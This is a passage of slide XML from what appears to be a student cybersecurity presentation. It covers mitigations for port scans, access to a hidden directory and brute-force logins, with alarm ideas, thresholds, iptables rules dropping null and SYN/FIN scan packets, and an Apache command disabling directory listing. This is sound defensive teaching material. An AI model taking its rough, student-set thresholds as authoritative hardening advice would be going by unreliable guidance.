          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12301" y="1602450"/>
            <a:ext cx="4737863"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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An alert that triggers when a large amount of traffic occurs in a very short time from a single source IP that’s targeting multiple ports.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a: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I would set the threshold to be if a single IP address requests more than 10 requests per second and more than 10 seconds or 100 consecutive ping requests.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418437" y="1604700"/>
            <a:ext cx="4934967"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP wrapper can be set to permit or deny access to the servers based on IP addresses or domain names. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Configure firewall to look for potentially malicious behavior over time and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute or 100 consecutive ping (ICMP) requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and setup Iptables for the firewall port scanning and blocking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>iptables -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-flags ALL NONE -j DROP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iptables -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-flags SYN,FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN,FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -j DROP.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA8EC3C-9647-4C26-BDA9-7FE6DC652F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14297199-44FC-4610-B496-FE2AA78322BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4781902"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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A alarm that triggers if any request is made for the hidden directory from an IP address outside the internal network.</a:t>
            </a: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Another alarm should be set to trigger if sequential requests from a single IP is made to the directory.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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Set the threshold for grater than 0 sequential requests made from IP addresses which are unknown.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383536" y="1604700"/>
            <a:ext cx="4865166"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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Implement unique usernames and complex passwords, especially for users with access to hidden files/directories.</a:t>
            </a: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Use encryption for the files in the hidden directories.</a:t>
            </a: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Disable directory listing in Apache.</a:t>
            </a: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Whitelist the IP addresses which need to have access to the folder.</a:t>
            </a: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This sort of directory should not exist in the first place, deleting  it would be a possibility.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install an IDS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a whitelist for authorized IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a2dismod --force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>autoindex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235986E2-21C9-49F1-9AE2-CE372BFBC582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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24</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03510D9-BB79-4408-B70B-CE32D1666FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="45843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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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An alarm that triggers if a predefined number of requests are made to the server from a single IP address, and the http response code is 401 (unauthorized). </a:t>
            </a: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Additionally an alarm should be set if several consecutive authentication requests failed.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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I would set the threshold to 50 for requests made from a single IP address.</a:t>
            </a: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I would allow no more that 5 consecutive  failed authentication attempts.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355615" y="1604700"/>
            <a:ext cx="4997789"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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Implement unique and more complex username and passwords.</a:t>
            </a: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Limit logins to whitelist of IP addresses.</a:t>
            </a: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Setting up a lockout policy to lock accounts after 5 consecutive failed login attempts from the same IP address.</a:t>
            </a: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Use Two/ Multi -Factor-Authentication (MFA) for every user. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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A stronger username and password policy combined with a lockout policy will slow down a brute-force-attack, MFA helps preventing the attack since it requires an additional code or verification method to gain access.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
